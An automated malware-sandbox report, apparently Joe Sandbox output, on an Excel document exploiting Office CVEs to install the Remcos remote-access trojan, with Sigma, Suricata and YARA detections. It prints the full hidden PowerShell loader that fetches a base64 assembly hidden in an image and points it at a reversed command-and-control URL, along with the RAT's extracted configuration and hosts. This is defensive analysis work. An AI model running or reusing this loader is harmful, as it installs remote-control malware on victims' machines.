                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3604, Protocol: tcp, SourceIp: 88.99.66.38, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3604, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , ProcessId: 3208, ProcessName: wscript.exe
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3604, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3816, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3308, TargetFilename: C:\Users\user\AppData\Local\Temp\z4z03ydu.kcd.ps1

                  Data Obfuscation

                  barindex
                  Sigma detected: Powershell download and load assembly
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: Registry Key setAuthor: Joe Security: Data: Details: CD 29 1C FA EC C0 35 3B A1 ED 56 E5 3A 6F A6 17 A7 71 46 10 BD EE 7F 44 47 88 F9 A2 F6 2A 67 BD 3A E1 64 07 D0 D5 3A 1B E4 EA 27 CA 7A CD 6A DE 7B 37 71 3A 68 41 30 FC 7D 01 D5 76 BE D8 4C 88 D4 AF 62 AE D9 7B B4 D9 D1 81 4B 80 44 31 FD 7B D1 1F FC 0A 12 66 81 37 2E 7E C1 CD 4B 41 3F 05 0F D2 1A 5D 31 80 1D 42 FE B1 DA DA E9 CD 25 30 E2 1A , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 2496, TargetObject: HKEY_CURRENT_USER\Software\Rmc-4CT19T\exepath

                  Suricata Signatures

                  Timestamp:2024-08-28T22:29:41.372209+0200
                  SID:2036594
                  Severity:1
                  Source Port:49173
                  Destination Port:2404
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-28T22:29:42.525533+0200
                  SID:2036594
                  Severity:1
                  Source Port:49174
                  Destination Port:2404
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-28T22:29:40.121636+0200
                  SID:2020423
                  Severity:1
                  Source Port:80
                  Destination Port:49172
                  Protocol:TCP
                  Classtype:Exploit Kit Activity Detected
                  Timestamp:2024-08-28T22:29:40.121636+0200
                  SID:2020425
                  Severity:1
                  Source Port:80
                  Destination Port:49172
                  Protocol:TCP
                  Classtype:Exploit Kit Activity Detected
                  Timestamp:2024-08-28T22:29:42.678496+0200
                  SID:2803304
                  Severity:3
                  Source Port:49175
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-28T22:29:39.341451+0200
                  SID:2049038
                  Severity:1
                  Source Port:443
                  Destination Port:49171
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgURL Reputation: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                  Found malware configuration
                  Source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "192.3.101.172:2404:1192.3.101.172:9674:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4CT19T", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for submitted file
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxReversingLabs: Detection: 18%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR
                  Machine Learning detection for sample
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,14_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404423 FreeLibrary,CryptUnprotectData,15_2_00404423
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_bf9d7ce0-8

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.12.81.228 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                  Source: ~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmp.3.drStream path '_1786367723/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: ~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmp.3.drStream path '_1786367727/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407538 _wcslen,CoGetObject,14_2_00407538
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
